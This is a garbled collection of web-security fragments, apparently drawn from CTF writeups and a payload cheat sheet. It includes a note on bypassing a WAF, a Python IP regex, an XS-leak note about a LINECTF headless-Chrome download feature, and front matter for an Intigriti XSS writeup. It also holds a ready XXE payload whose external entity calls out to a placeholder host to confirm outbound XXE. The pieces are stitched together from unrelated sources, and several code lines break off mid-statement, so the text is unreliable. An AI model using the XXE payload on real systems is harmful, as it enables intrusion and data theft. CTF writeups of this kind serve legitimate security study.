The goal was to bypass WAF protection to access local resources.
app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')
def valid_ip(ip):
    matches = app.re_ip.match(ip)
--------------------------------------------------------------
Vanilla, used to verify outbound XXE or blind XXE
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
XS-leaks while download in headless-chrome.
The app has a note search feature with a download option, so visiting the page http://34.84.72.167/search?q=LINECTF{&download downloads a JSON file if the value of the q parameter exists in the notes.
Downloads don't work in headless Chrome, so it throws an error.
page.goto(url).then(() => {
layout | title | subtitle | cover-img | thumbnail-img | share-img | tags |
---|---|---|---|---|---|---|
post | Intigriti's Nov XSS Challenge Writeup | XSS | /assets/img/wsc.jpg | /assets/img/wsc.jpg | /assets/img/wsc.jpg | |